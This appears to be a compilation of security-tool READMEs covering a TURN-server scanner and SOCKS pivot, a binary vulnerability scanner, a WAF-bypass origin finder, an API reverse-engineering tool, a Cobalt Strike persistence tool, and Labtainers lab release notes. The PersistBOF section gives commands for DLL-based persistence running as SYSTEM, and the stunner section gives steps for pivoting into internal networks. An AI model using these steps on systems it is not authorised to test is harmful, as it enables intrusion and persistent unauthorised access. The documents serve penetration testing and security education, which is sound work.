--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--ports value                 Ports to check (default: "80,443,8080,8081")
--ip value                    Scan single IP instead of whole private range. If left empty all private ranges are scanned. Accepts single IPs or CIDR format. (accepts multiple inputs)
--help, -h                    show help (default: false)

Example

./stunner tcp-scanner -s x.x.x.x:3478 -u username -p password

Example workflow

Let's say you find a service using WebRTC and want to test it.

First step is to get the required data. I suggest launching Wireshark in the background and just joining a meeting via Burp to collect all HTTP and websocket traffic. Next, search your Burp history for some keywords related to TURN, like 3478, password, credential and username (be sure to also check the websocket tab for these keywords). This might reveal the TURN server, the protocol (UDP and TCP endpoints might have different ports) and the credentials used to connect. If you can't find the data in Burp, start looking at Wireshark to identify the traffic. If it's on a non-standard port (anything other than 3478), decode the protocol in Wireshark via a right click as STUN. This should show you the username used to connect, and you can use this information to search Burp's history even further for the required data. Please note that Wireshark can't show you the password, as the password is used to hash some packet contents and so cannot be reversed.

Next step would be to issue the info command against the TURN server, using the correct port and protocol obtained from Burp.

If this works, the next step is a range-scan. If this allows any traffic to internal systems you can exploit this further but be aware that UDP has only limited use cases.

If TCP connections to internal systems are allowed, simply launch the socks command, set the SOCKS proxy to 127.0.0.1:1080, and access the allowed IPs via a browser. You can try out 127.0.0.1:443 and other IPs to find management interfaces.



BinAbsInspector - Vulnerability Scanner For Binaries


BinAbsInspector (Binary Abstract Inspector) is a static analyzer for automated reverse engineering and scanning vulnerabilities in binaries, a long-term research project incubated at Keenlab. It is based on abstract interpretation with support from Ghidra, and works on Ghidra's Pcode instead of assembly. Currently it supports binaries on x86, x64, armv7 and aarch64.


Installation

  • Install Ghidra according to Ghidra's documentation
  • Install Z3 (tested version: 4.8.15)
  • Note that generally there are two parts to the Z3 library: one is the Java package, the other is the native library. The Java package is already included in the "/lib" directory, but we suggest that you replace it with your own Java package for version compatibility.
    • For Windows, download a pre-built package from here, extract the zip file and add a PATH environment variable pointing to z3-${version}-win/bin
    • For Linux, installing with a package manager is NOT recommended; there are two options:
      1. You can download a suitable pre-built package from here, extract the zip file and copy the *.so files from its bin/ directory to /usr/local/lib/
      2. or you can build and install Z3 according to Building Z3 using make and GCC/Clang
    • For MacOS, it is similar to Linux.
  • Download the extension zip file from release page
  • Install the extension according to Ghidra Extension Notes

Building

You can build the extension yourself; if you want to develop a new feature, please refer to the development guide.

  • Install Ghidra and Z3
  • Install Gradle 7.x (tested version: 7.4)
  • Pull the repository
  • Run gradle buildExtension under repository root
  • The extension will be generated at dist/${GhidraVersion}_${date}_BinAbsInspector.zip

Usage

You can run BinAbsInspector in headless mode, GUI mode, or with docker.

  • With Ghidra headless mode.
$GHIDRA_INSTALL_DIR/support/analyzeHeadless <projectPath> <projectName> -import <file> -postScript BinAbsInspector "@@<scriptParams>"

<projectPath> -- Ghidra project path.
<projectName> -- Ghidra project name.
<scriptParams> -- The arguments for our analyzer, providing the following options:

Parameter                             Description
[-K <kElement>]                       KSet size limit K
[-callStringK <callStringMaxLen>]     Call string maximum length K
[-Z3Timeout <timeout>]                Z3 timeout
[-timeout <timeout>]                  Analysis timeout
[-entry <address>]                    Entry address
[-externalMap <file>]                 External function model config
[-json]                               Output in json format
[-disableZ3]                          Disable Z3
[-all]                                Enable all checkers
[-debug]                              Enable debugging log output
[-check "<cweNo1>[;<cweNo2>...]"]     Enable specific checkers
  • With Ghidra GUI

    1. Run Ghidra and import the target binary into a project
    2. Analyze the binary with default settings
    3. When the analysis is done, open Window -> Script Manager and find BinAbsInspector.java
    4. Double-click on BinAbsInspector.java entry, set the parameters in configuration window and click OK
    5. When the analysis is done, you can see the CWE reports in the console window; double-clicking an address in a report jumps to the corresponding address
  • With Docker

git clone git@github.com:KeenSecurityLab/BinAbsInspector.git
cd BinAbsInspector
docker build . -t bai
docker run -v $(pwd):/data/workspace bai "@@<script parameters>" -import <file>

Implemented Checkers

So far BinAbsInspector supports the following checkers:

  • CWE78 (OS Command Injection)
  • CWE119 (Buffer Overflow (generic case))
  • CWE125 (Buffer Overflow (Out-of-bounds Read))
  • CWE134 (Use of Externally-Controlled Format string)
  • CWE190 (Integer overflow or wraparound)
  • CWE367 (Time-of-check Time-of-use (TOCTOU))
  • CWE415 (Double free)
  • CWE416 (Use After Free)
  • CWE426 (Untrusted Search Path)
  • CWE467 (Use of sizeof() on a pointer type)
  • CWE476 (NULL Pointer Dereference)
  • CWE676 (Use of Potentially Dangerous Function)
  • CWE787 (Buffer Overflow (Out-of-bounds Write))

Project Structure

The structure of this project is as follows; please refer to the technical details for more information.

β”œβ”€β”€ main
β”‚ β”œβ”€β”€ java
β”‚ β”‚ └── com
β”‚ β”‚ └── bai
β”‚ β”‚ β”œβ”€β”€ checkers checker implementatiom
β”‚ β”‚ β”œβ”€β”€ env
β”‚ β”‚ β”‚ β”œβ”€β”€ funcs function modeling
β”‚ β”‚ β”‚ β”‚ β”œβ”€β”€ externalfuncs external function modeling
β”‚ β”‚ β”‚ β”‚ └── stdfuncs cpp std modeling
β”‚ β”‚ β”‚ └── region memory modeling
β”‚ β”‚ β”œβ”€β”€ solver analyze core and grpah module
β”‚ β”‚ └── util utilities
β”‚ └── resources
└── test

You can also build the javadoc with gradle javadoc, the API documentation will be generated in ./build/docs/javadoc.

Acknowledgement

We employ Ghidra as our foundation and frequently leverage JImmutable Collections for better performance.
Here we would like to thank them for their great help!



Hakoriginfinder - Tool For Discovering The Origin Host Behind A Reverse Proxy. Useful For Bypassing Cloud WAFs!


Tool for discovering the origin host behind a reverse proxy. Useful for bypassing WAFs and other reverse proxies.

How does it work?

This tool will first make an HTTP request to the hostname that you provide and store the response. Then it will make a request to every IP address that you provide via HTTP (80) and HTTPS (443), with the Host header set to the original host. Each HTTP response is then compared to the original using the Levenshtein algorithm to determine similarity. If a response is similar, it is deemed a match.
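
The core loop can be sketched in Python as follows (hakoriginfinder itself is written in Go; the hostname, candidate IP and threshold below are illustrative):

import requests

def levenshtein(a, b):
    # Classic dynamic-programming edit distance.
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

original = requests.get("https://example.com", timeout=5).text
for ip in ["93.184.216.34"]:                      # candidate origin IPs
    for scheme in ("http", "https"):
        try:
            r = requests.get(scheme + "://" + ip, timeout=5, verify=False,
                             headers={"Host": "example.com"})
        except requests.RequestException:
            continue
        score = levenshtein(original, r.text)
        print("MATCH" if score <= 5 else "NOMATCH", scheme + "://" + ip, score)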


Usage

Provide the list of IP addresses via stdin, and the original hostname via the -h option. For example:

prips 93.184.216.0/24 | hakoriginfinder -h example.com

You may set the Levenshtein distance threshold with -l. The lower the number, the more similar the responses need to be for a match; the default is 5.

The number of threads may be set with -t, default is 32.

The hostname is set with -h, there is no default.

Output

The output is 3 columns, separated by spaces. The first column is either "MATCH" or "NOMATCH", depending on whether the Levenshtein threshold was reached or not. The second column is the URL being tested, and the third column is the Levenshtein score.

Output example

hakluke$ prips 1.1.1.0/24 | hakoriginfinder -h one.one.one.one
NOMATCH http://1.1.1.0 54366
NOMATCH http://1.1.1.30 54366
NOMATCH http://1.1.1.20 54366
NOMATCH http://1.1.1.4 54366
NOMATCH http://1.1.1.11 54366
NOMATCH http://1.1.1.5 54366
NOMATCH http://1.1.1.22 54366
NOMATCH http://1.1.1.13 54366
NOMATCH http://1.1.1.10 54366
NOMATCH http://1.1.1.25 54366
NOMATCH http://1.1.1.19 54366
... snipped for brevity ...
NOMATCH http://1.1.1.251 54366
NOMATCH http://1.1.1.248 54366
MATCH http://1.1.1.1 0
NOMATCH http://1.1.1.3 19567
NOMATCH http://1.1.1.2 19517
MATCH https://1.1.1.1 0
NOMATCH https://1.1.1.3 19534
NOMATCH https://1.1.1.2 19532

Installation

Install golang, then run:

go install github.com/hakluke/hakoriginfinder@latest


Mitmproxy2Swagger - Automagically Reverse-Engineer REST APIs Via Capturing Traffic


A tool for automatically converting mitmproxy captures to OpenAPI 3.0 specifications. This means that you can automatically reverse-engineer REST APIs by just running the apps and capturing the traffic.


Installation

First you will need python3 and pip3.

$ pip install mitmproxy2swagger 
# ... or ...
$ pip3 install mitmproxy2swagger

Then run mitmproxy2swagger as per the examples below.

Usage

Mitmproxy

To create a specification by inspecting HTTP traffic you will need to:

  1. Capture the traffic by using the mitmproxy tool. I personally recommend using mitmweb, which is a web interface built into mitmproxy.

    $ mitmweb
    Web server listening at http://127.0.0.1:8081/
    Proxy server listening at http://*:9999
    ...

    IMPORTANT

    To configure your client to use the proxy exposed by mitmproxy, please consult the mitmproxy documentation for more information.

  2. Save the traffic to a flow file.

    In mitmweb you can do this by using the "File" menu and selecting "Save":

  3. Run the first pass of mitmproxy2swagger:

    $ mitmproxy2swagger -i <path_to_mitmproxy_flow> -o <path_to_output_schema> -p <api_prefix>

    Please note that you can use an existing schema, in which case the existing schema will be extended with the new data. You can also run it a few times with different flow captures, the captured data will be safely merged.

    <api_prefix> is the base url of the API you wish to reverse-engineer. You will need to obtain it by observing the requests being made in mitmproxy.

    For example if an app has made requests like these:

    https://api.example.com/v1/login
    https://api.example.com/v1/users/2
    https://api.example.com/v1/users/2/profile

    The likely prefix is https://api.example.com/v1.

  4. Running the first pass should have created a section in the schema file like this:

    x-path-templates:
    # Remove the ignore: prefix to generate an endpoint with its URL
    # Lines that are closer to the top take precedence, the matching is greedy
    - ignore:/addresses
    - ignore:/basket
    - ignore:/basket/add
    - ignore:/basket/checkouts
    - ignore:/basket/coupons/attach/{id}
    - ignore:/basket/coupons/attach/104754

    You should edit the schema file with a text editor and remove the ignore: prefix from the paths you wish to be generated. You can also adjust the parameters appearing in the paths.

  5. Run the second pass of mitmproxy2swagger:

    $ mitmproxy2swagger -i <path_to_mitmproxy_flow> -o <path_to_output_schema> -p <api_prefix> [--examples]

    Run the command a second time (with the same schema file). It will pick up the edited lines and generate endpoint descriptions.

    Please note that mitmproxy2swagger will not overwrite existing endpoint descriptions, if you want to overwrite them, you can delete them before running the second pass.

    Passing --examples will add example data to requests and responses. Take caution when using this option, as it may add sensitive data (tokens, passwords, personal information etc.) to the schema.

HAR

  1. Capture and export the traffic from the browser DevTools.

    In the browser DevTools, go to the Network tab and click the "Export HAR" button.

  2. Continue the same way you would do with the mitmproxy dump. mitmproxy2swagger will automatically detect the HAR file and process it.

Example output

See the examples. You will find a generated schema there and an html file with the generated documentation (via redoc-cli).

See the generated html file here.



PersistBOF - Tool To Help Automate Common Persistence Mechanisms


A tool to help automate common persistence mechanisms. Currently supports Print Monitor (SYSTEM), Time Provider (Network Service), Start folder shortcut hijacking (User), and Junction Folder (User).


Usage

Clone, run make, add .cna to Cobalt Strike client.

run: help persist-ice in CS console

Syntax:

  • persist-ice [PrintMon, TimeProv, Shortcut, Junction] [persist or clean] [key/folder name] [dll / lnk exe name];

Technique Overview

All of these techniques rely on a Dll file that is separately placed on disk. It is intentionally not part of the BOF.

Print Monitor

The Dll MUST be on disk and in a location in PATH (Dll search order) BEFORE you run the BOF. It will fail otherwise. The Dll will immediately be loaded by spoolsv.exe as SYSTEM. This can be used to elevate from admin to SYSTEM as well as for persistence. Will execute on system startup. Must be elevated to run.

  • Demo Print Monitor Dll in project

Example:

  1. upload NotMalware.dll to C:\Windows\NotMalware.dll
  2. persist-ice PrintMon persist TotesLegitMonitor NotMalware.dll
  3. Immediately executes as SYSTEM
  4. Will execute on startup until removed
  5. persist-ice PrintMon clean TotesLegitMonitor C:\Windows\NotMalware.dll > Will delete the registry keys and unload the Dll, then attempt to delete the dll if provided the correct path. Should succeed.

Time Provider

Loaded by svchost.exe as NETWORK SERVICE (get your potatoes ready!) on startup after running the BOF. Must be elevated to run.

  • Demo Time Provider Dll in project

Example:

  • persist-ice TimeProv persist TotesLegitTimeProvider C:\anywhere\NotMalware.dll
  • persist-ice TimeProv clean TotesLegitTimeProvider C:\anywhere\NotMalware.dll > Will delete the registry keys and attempt to delete the dll if provided the correct path. This will probably fail, because the dll is not unloaded by the process.

Junction Folder

Same technique as demonstrated in the Vault 7 leaks. Executed on user login. Non-elevated. The Dll will be loaded into explorer.exe.

Example:

  • persist-ice Junction persist TotesLegitFolder C:\user-writable-folder\NotMalware.dll > Save the CLSID output for the clean step
  • persist-ice Junction clean TotesLegitFolder C:\user-writable-folder\NotMalware.dll 6be5e092-90cc-452d-be83-208029e259e0 > Will delete the registry keys, junction folder, and attempt to delete the dll.

Start Folder Hijack

Create a new, user-writable folder, copy a hijackable Windows binary to the folder, then create a shortcut in the startup folder. Executed on user login. Non-elevated.

Example:

  • persist-ice Shortcut persist C:\TotesLegitFolder C:\Windows\System32\Dism.exe > upload your Dll as a proxy dll for dismcore.dll into C:\TotesLegitFolder
  • persist-ice Shortcut clean C:\TotesLegitFolder C:\Windows\System32\Dism.exe > Will attempt to delete all files in the new folder, then delete the folder itself. If the Dll is still loaded in a process, this will fail.

References

https://stmxcsr.com/persistence/print-monitor.html

https://stmxcsr.com/persistence/time-provider.html

https://pentestlab.blog/2019/10/28/persistence-port-monitors/

https://blog.f-secure.com/hunting-for-junction-folder-persistence/

https://attack.mitre.org/techniques/T1547/010/

https://attack.mitre.org/techniques/T1547/003/

https://attack.mitre.org/techniques/T1547/009/



Labtainers - A Docker-based Cyber Lab Framework


Labtainers include more than 50 cyber lab exercises and tools to build your own. Import a single VM appliance or install on a Linux system and your students are done with provisioning and administrative setup, for these and future lab exercises.

  • Consistent lab execution environments and automated provisioning via Docker containers
  • Multi-component network topologies on a modestly performing laptop computer
  • Automated assessment of student lab activity and progress
  • Individualized lab exercises to discourage sharing solutions

Labtainers provide controlled and consistent execution environments in which students perform labs entirely within the confines of their computer, regardless of the Linux distribution and packages installed on the student's computer. Labtainers run on our VM appliance, or on any Linux with Docker installed. Labtainers is also available as cloud-based VMs, e.g., on Azure as described in the Student Guide.

See the Student Guide for installation and use, and the Instructor Guide for student assessment. Developing and customizing lab exercises is described in the Designer Guide. See the Papers for additional information about the framework. The Labtainers website, and downloads (including VM appliances with Labtainers pre-installed) are at https://nps.edu/web/c3o/labtainers.
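
A typical student session looks something like this (a sketch; the lab name is only an example, and the path assumes the default install location):

cd ~/labtainer/labtainer-student    # work directory for student labs (assumed location)
labtainer nmap-ssh                  # start a lab; images are pulled on first run
checkwork                           # view automated assessment results so far (where supported)
stoplab                             # stop the lab and collect artifacts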

Distribution created: 03/25/2022 09:37
Revision: v1.3.7c
Commit: 626ea075
Branch: master


Distribution and Use

Please see the licensing and distribution information in the docs/license.md file.

Guide to directories

  • scripts/labtainers-student -- the work directory for running and testing student labs. You must be in that directory to run student labs.

  • scripts/labtainers-instructor -- the work directory for running and testing automated assessment and viewing student results.

  • labs -- Files specific to each of the labs

  • setup_scripts -- scripts for installing Labtainers and Docker and updating Labtainers

  • docs -- latex source for the labdesigner.pdf, and other documentation.

  • UI -- Labtainers lab editor source code (Java).

  • headless-lite -- scripts for managing Docker Workstation and cloud instances of Labtainers (systems that do not have native X11 servers).

  • scripts/designer -- Tools for building new labs and managing base Docker images.

  • config -- system-wide configuration settings (these are not the lab-specific configuration settings).

  • distrib -- distribution support scripts, e.g., for publishing labs to the Docker hub.

  • testsets -- Test procedures and expected results. (Per-lab drivers for SimLab are not distributed).

  • pkg-mirrors -- utility scripts for internal NPS package mirroring to reduce external package pulling during tests and distribution.

Support

Use the GitHub issue reports, or email me at mfthomps@nps.edu

Also see https://my.nps.edu/web/c3o/support1

Release notes

The standard Labtainers distribution does not include files required for development of new labs. For those, run ./update-designer.sh from the labtainer/trunk/setup_scripts directory.

The installation script and the update-designer.sh script set environment variables, so you may want to logout/login, or start a new bash shell before using Labtainers the first time.

March 23, 2022

  • Fix path to tap lock directory; was causing failure of labs using network taps
  • Update plc-traffic netmon computer to have openjfx needed for new grassmarlin in java environment
  • Speed up lab startup by avoiding chown -R, which is very slow in docker.
  • Another shot at avoiding deletion of the X11 link in container /tmp directory.
  • Fix webtrack counting of sites visited and remove the live-headers goal; that tool is no longer available. Clarified some lab manual steps.

March 2, 2022

  • Add new ssh-tunnel lab (thanks GWD!)
  • Fix labedit failure to reflect X11 value set by new_lab_setup
  • Add option to not parameterize a container

February 23, 2022

  • labedit was corrupting start.config after addition of new containers
  • Incorrect path to student guide in the student README file; dynamically change for cloud configs
  • Incorrect extension to update-labtainer.sh
  • Misc guide enhancements
  • Update the ghidra lab to include version 10.1.2 of Ghidra

February 15, 2022

  • Revert Azure cloud support to provision for each student. Azure discourages sharing resources.

January 24, 2022

  • Azure cloud now uses image stored in an Azure blob instead of provisioning for each student.
  • Added support for Google Cloud.

January 19, 2022

  • Introduce Labtainers on the Azure cloud. See the Student Guide for details on how to use this.

January 3, 2022

  • Revise setuid-env lab to add better assessment and SimLab testing, and to avoid SIGHUP in the printenv child.
  • Fix assessment goal count directive to exclude result tag values of false.
  • Do not require labname when using gradelab -a with a grader started with the debug option.
  • Revise capinout (stdin/stdout mirroring) to handle orphaning of command process children, improved documentation and error handling.
  • Added display of progress bars of docker images being pulled when a lab is first run.
  • User feedback on progress of container initialization.
  • The pcap-lib lab was missing a notify file needed for automated assessment; Remove extraneous step from Lab Manual.

November 23, 2021

  • Disable ubuntu popup errors on test VM.
  • Fix handling of different DISPLAY variable formats.

October 22, 2021

  • Revise the tcpip lab guide to note a successful syn-flood attack is not possible. Fix its automated assessment and add SimLab scripts.
  • Change artifact file extension from zip to lab, and add a preamble to confuse GUI file managers. Students were opening the zip and submitting its guts.
  • Make the -r option to gradelab the default, add a -c option for cumulative use of grader.
  • Modify refresh_mirror to refer to the local release date to avoid frequent queries of DockerHub. Each such query counts as an image pull, and they are now trying to monetize those.

September 30, 2021

  • Change bufoverflow lab guide and grading to not expect success with ASLR turned on, assess whether it was run.
  • Error handling for web grader for cases where student lacks results.
  • Print warning when deprecated lab is run.
  • Change formatstring grading to remove unused "_leaked_secret" description and clarify value of leaked_no_scanf.
  • Also change formatstring grading to allow any name for the vulnerable executable.

September 29, 2021

  • Gradelab error handling, reduce instances of crashes due to bad zip files.
  • Limit stdout artifact files to 1MB

September 17, 2021

  • Ghidra lab guide had wrong IP address, was not remade from source.

September 14, 2021

  • Example labs for LDAP and Mariadb using SSL. Intended as templates for new labs.
  • Handle Mariadb log format
  • Add per-container parameters to limit CPU use or pin container to CPU set.
  • Labpack creation now available via a GUI (makepackui).
  • Tab completion for the labtainer, labpack and gradelab commands.
  • New parallel computing lab "parallel" using MPI.

August 3, 2021

  • Add a "WAIT_FOR" configuration option to cause a container to delay parameterization until another container completes its parameterization.
  • Support for Mariadb log formats in results parsing
  • Remove support for Mac and Windows use of Docker Desktop. That product is too unstable for us to support.
  • Suppress stderr messages when the user uses built-in bash commands such as "which".
  • Bug fixes to makepack/labpack programs.

July 19, 2021

  • Add a DNS lab to introduce the DNS protocol and configuration.
  • Revised VirtualBox appliance image to start with the correct update script.
  • Split resolv.conf nameserver parameter out of the lab_gw configuration field into its own value.
  • IModule command failed if run before any labs had been started.

July 5, 2021

  • Errors in DISPLAY env variable management broke GUI applications on Docker Desktop.

July 1, 2021

  • Support Mac package installation of headless Labtainers.
  • The routing-basics lab automated assessment failed due to lack of treataslocal files
  • Correct typos and incorrect addresses in routing-basics lab, and fix automated assessment.
  • Assessment of pcapanalysis was failing.

June 10, 2021

  • All lab manual PDFs are now in the github repo
  • Convert vpnlab and vpnlab2 instructions to PDF lab manuals.

May 25, 2021

  • Add searchable keywords to each lab. See "labtainer -h" for usage.
  • Expand routing-basics lab and lab manual
  • Remove routing-basics2 lab, it is now redundant.
  • sudo on some containers failed because hostnames remove underscores, leading to a mismatch with the hosts file. Fixed with an extra entry in the hosts file using the container name sans underscore.
  • New Labpack feature to package a collection of labs, and makepack tool to create Labpacks.
  • Error check for /sbin directory when using ubuntu20 -- would be silently fatal.
  • New network-basics lab

May 5, 2021

  • Introduce a new users lab to introduce user/group management
  • Suppress AppArmor host messages in centos container syslogs

April 28, 2021

  • New base2 images lacked man pages. Used unminimize to restore them in the base image.
  • Introduce an OSSEC host-based IDS lab.

April 13, 2021

  • CyberCIEGE lab failed because X11 socket was not relocated prior to starting Wine via fixlocal.

April 9, 2021

  • New gdb-cpp tutorial lab for using GDB on a simple C++ program.
  • Floating point exceptions were revealing use of exec_wrap.sh for stdin/stdout mirroring.

April 7, 2021

  • The ldap lab failed when moved to Ubuntu 20; traced to a problem with the nscd cache of pwd. Moved ldap to Ubuntu 20.

March 23, 2021

  • Parameterizing with RANDOM did not include the upper bound.
  • Add optional step parameter to RANDOM, e.g., to ensure word boundaries.
  • db-access lab: add mysql-workbench to database computer.
  • New overrun lab to illustrate memory references beyond bounds of c data structures.
  • New printf lab to introduce memory references made by the printf function.

March 19, 2021

  • gradelab ignores makedirs errors; problem with Windows rmtree on shared folders.
  • gradelab handle spaces in student zip file names.
  • gradelab handle zip file names from Moodle, including build downloads.

March 12, 2021

  • labedit UI: Remove old wireshark image from list of base images.
  • labedit UI: Increase some font sizes.
  • grader web interface failed to display lab manuals if the manual name does not follow naming conventions.

March 11, 2021

  • labedit UI add registry setting in new global lab configuration panel.

March 10, 2021

  • labedit UI fixes to not build if syntax error in lab
  • labedit UI "Lab running" indicator fix to reflect current lab.

March 8, 2021

  • Deprecate use of HOST_HOME_XFER, all labs use directory per the labtainer.config file.
  • Add documentation comment to start.config for REGISTRY and BASE_REGISTRY

March 5, 2021

  • Error handling on gradelab web interface when missing results.
  • labedit addition of precheck, msc bug fixes.

February 26, 2021

  • The dmz-example lab had errors in routing and setup of dnsmasq on some components.

February 18, 2021

  • UI was rebuilding images because it was updating file times without cause
  • Clean up UI code to remove some redundant data copies.

February 14, 2021

  • Add local build option to UI
  • Create empty faux_init for centos6 bases.

February 11, 2021

  • Fix UI handling of editing files. Revise layout and eliminate unused fields.
  • Add ubuntu20 base2 base configuration along with ssh2, network2 and wireshark2
  • The new wireshark solves the problem of black/noise windows.
  • Map /tmp/.X11-unix to /var/tmp and create a link. Needed for ubuntu20 (was deleting /tmp?) and may fix others.

February 4, 2021

  • Add SIZE option to results artifacts
  • Simplify wireshark-intro assessment and parameterization and add PDF lab manual.
  • Provide parameter list values to pregrade.sh script as environment variables
  • enable X11 on the grader
  • put update-designer.sh into users path.

January 19, 2021

  • Change management of README date/rev to update file in source repo.
  • Introduce GUI for creating/editing labs -- see labedit command.

December 21, 2020

  • The gradelab function failed when zip files were copied from a VirtualBox shared folder.
  • Update Instructor Guide to describe management of student zip files on host computers.

December 4, 2020

  • Transition distribution of tar to GitHub release artifacts
  • Eliminate separate designer tar file, use git repo tarball.
  • Testing of grader web functions for analysis of student lab artifacts
  • Clear logs from full smoketest and delete grader container in removelab command.

December 1, 2020

  • The iptables2 lab assessment relied on random ports being "unknown" to nmap.
  • Use a sync directory to delay smoketests from starting prior to lab startup.
  • Begin integrating Lab designer UI elements.

October 13, 2020

  • Headless configurations for running on Docker Desktop on Macs & Windows
  • Headless server support, cloud-config file for cloud deployments
  • Testing support for headless configurations
  • Force mynotify to wait until rc.local runs on boot
  • Improve mynotify service ability to merge output into single timestamp
  • Python3 for stopgrade script
  • SimLab now uses docker top rather than system ps

September 26, 2020

  • Clean up the stoplab scripts to ignore non-lab containers
  • Add db-access database access control lab for controlled sharing of a mysql db.

September 17, 2020

  • The macs-hash lab was unable to run Leafpad due to the X11 setting.
  • Grader logging was being redirected to the wrong log file, now captures errors from instructor.py
  • Copy instructor.log from grader to the host logs directory if there is an error.

August 28, 2020

  • Fix install script to use python3-pip and fix broken scripts: getinfo.py and pull-all.py
  • Registry logic was broken, test systems were not using the test registry, add development documentation.
  • Add juiceshop and owasp base files for OWASP-based web security labs
  • Remove unnecessary sudos from check_nets
  • Add CHECK_OK documentation directive for automated assessment
  • Change check_nets to fix iptables and routing issues if so directed.

August 12, 2020

  • Add timeout to prestop scripts
  • Add quiz and checkwork to dmz-lab
  • Restarting the dmz-lab without -r option broke routing out of the ISP.
  • Allow multiple files for time_delim results.

August 6, 2020

  • Bug in error handling when X11 socket is missing
  • Commas in quiz questions led to parse errors
  • Add quiz and checkwork to iptables2 lab

July 28, 2020

  • Add quiz support -- these are guidance quizzes, not assessment quizzes. See the designer guide.
  • Add current-state assessment for use with the checkwork command.

July 21, 2020

  • Add testsets/bin to designer's path
  • Designer guide corrections and explanations for IModule steps.
  • Add RANGE_REGEX result type for defining time ranges using regular expressions on log entries.
  • Check that X11 socket exists if it is needed when starting a lab.
  • Add base image for mysql
  • Handle mysql log timestamp formats in results parsing.

June 15, 2020

  • New base image containing the Bird open source router
  • Add bird-bgp Border Gateway Protocol lab.
  • Add bird-ospf Open Shortest Path First routing protocol.
  • Improve handling of DNS changes, external access from some containers was blocked in some sites.
  • Add section to Instructor Guide on using Labtainers in environments lacking Internet access.

May 21, 2020

  • Move all repositories to the Docker Hub labtainers registry
  • Support mounts defined in the start.config to allow persistent software installs
  • Change ida lab to use persistent installation of IDA -- new name is ida2
  • Add cgc lab for exploration of over 200 vulnerable services from the DARPA Cyber Grand Challenge
  • Add type_string command to SimLab
  • Add netflow lab for use of NetFlow network traffic analysis
  • Add 64-bit versions of the bufoverflow and the formatstring labs

April 9, 2020

  • Grader failed assessment of CONTAINS and FILE_REGEX conditions when wildcards were used for file selection.
  • Include hints for using hexedit in the symlab lab.
  • Add hash_equal operator and hash-goals.py to automated assessment to avoid publishing expected answers in configuration files.
  • Automated assessment for the pcap-lib lab.

April 7, 2020

  • Logs have been moved to $LABTAINER_DIR/logs
  • Other cleanup to permit rebuilds and tests using Jenkins, including use of unique temporary directories for builds
  • Move build support functions out of labutils into build.py
  • Add pcap-lib lab for PCAP library based development of traffic analysis programs

March 13, 2020

  • Add plc-traffic lab for use of GrassMarlin with traffic generated during the lab.
  • Introduce ability to add "tap" containers to collect PCAPs from selected networks.
  • Update GNS3 documentation for external access to containers, and use of dummy_hcd to simulate USB drives.
  • Change kali template to use faux_init rather than attempting to use systemd.
  • Moving distributions (tar files) to box.com
  • Change SimLab use of netstat to not do a dns lookup.

February 26, 2020

  • If labtainer command does not find lab, suggest that user run update-labtainer.sh
  • Add preliminary support for a network tap component to view all network traffic.
  • Script to fetch lab images to prep VMs that will be used without internet.
  • Provide username and password for nmap-discovery lab.

February 18, 2020

  • Inherit the DISPLAY environment variable from the host (e.g., VM) instead of assuming :0

February 11, 2020

  • Update guides to describe remote access to containers within GNS3 environments
  • Hide selected components and links within GNS3.
  • Figures in the webtrack lab guide were not visible; typos in this and nmap-ssh

February 6, 2020

  • Introduce function to remotely manage containers, e.g., push files.
  • Add GNS3 environment function to simulate insertion of a USB drive.
  • Improve handling of Docker build errors.

February 3, 2020

  • On the metasploit lab, the postgresql service was not running on the victim.
  • Merge the IModule manual content into the Lab Designer guide.
  • More IModule support.

January 27, 2020

  • Introduce initial support for IModules (instructor-developed labs). See docs/imodules.pdf.
  • Fix broken LABTAINER_DIR env variable within update-labtainer
  • Fix access mode on accounting.txt file in ACL lab (had become rw-r-r). Use explicit chmod in fixlocal.sh.

January 14, 2020

  • Port framework and gradelab to Python3 (existing Python2 labs will not change)
    • Use backward compatible random.seed options
    • Work around incompatible randint to return old values
    • Continue to support python2 for platforms that lack python3 (or those such as the older VM appliance that include python 3.5.2, which breaks random.seed compatibility).
    • Add rebuild alias for rebuild.py that will select python2 if needed.
  • Centos-based labs manpages were failing; use mandb within base docker file
  • dmz-lab netmask for DMZ network was wrong (caught by python3); as was IP address of inner gateway in lab manual
  • ghex removed from centos labs -- no longer easily supported by centos 7
  • file-deletion lab must be completed without rebooting the VM, note this in the Lab Manual.
  • Add NO_GW switch to start.config to disable default gateways on containers.
  • Metasploit lab crashes the host VM if run as privileged, and there are long delays on su if systemd is enabled, so run without systemd. Remove use of database from lab manual; configure to use the new NO_GW switch.
  • Update file headers for licensing/terms; add consolidated license file.
  • Modify publish.py to default to use of test registry, use -d to force use of default_registry
  • Revise source control procedures to use different test registry for each branch, and use a premaster branch for final testing of a release.

October 9, 2019

  • Remove dnsmasq from dns component in the dmz-lab. Was causing bind to fail on some installations.

October 8, 2019

  • Syntax error in test registry setup; lab designer info on large files; fetch bigexternal.txt files

September 30, 2019

  • DockerHub registry retrieval again failing for some users. Ignore html prefix to json.

September 20, 2019

  • Assessment of onewayhash should allow hmac operations on file of student's choosing.

September 5, 2019

  • Rebuild metasploit lab, metasploit-framework exhibited a bug. And the lab's "treataslocal" file was left out of the move from svn. Fix typo in metasploit lab manual.

August 30, 2019

  • Revert test for existence of container directories, they do not always exist.

August 29, 2019

  • Lab image pulls from docker hub failed due to change in github or curl? Catch redirect to cloudflare. Addition of GNS3 support. Fix to dmz-lab dnssec.

July 11, 2019

  • Automated assessment for CentOS6 containers, fix for firefox memory issue, support arbitrary docker create arguments in the start.config file.

June 6, 2019

  • Introduce a Centos6 base, but no support for automated assessment yet

May 23, 2019

  • Automated assessment of setuid-env failed due to typos in field separators.

May 8, 2019

  • Corrections to Capabilities lab manual

May 2, 2019

  • Acl lab fix to bobstuff.txt permissions. Use explicit chmod in fixlocal.sh
  • Revise student guide to clarify use of stop and -r option in body of the manual.

March 9, 2019

  • The checkwork function was reusing containers, thereby preventing students from eliminating artifacts from previous lab work.
  • Add appendix to the symkey lab to describe the BMP image format.

February 22, 2019

  • The http server failed to start in the vpn and vpn2 labs. Automated assessment removed from those labs until reworked.

January 27, 2019

  • Fix lab manual for routing-basics2 and fix routing to enable external access to the internal web server.

January 7, 2019

  • Fix gdblesson automated assessment to at least be operational.

December 29, 2018

  • Fix routing-basics2, same issues as routing-basics, plus an incorrect ip address in the gateway resolv.conf

December 5, 2018

  • Fix routing-basics lab, dns resolution at isp and gateway components was broken.

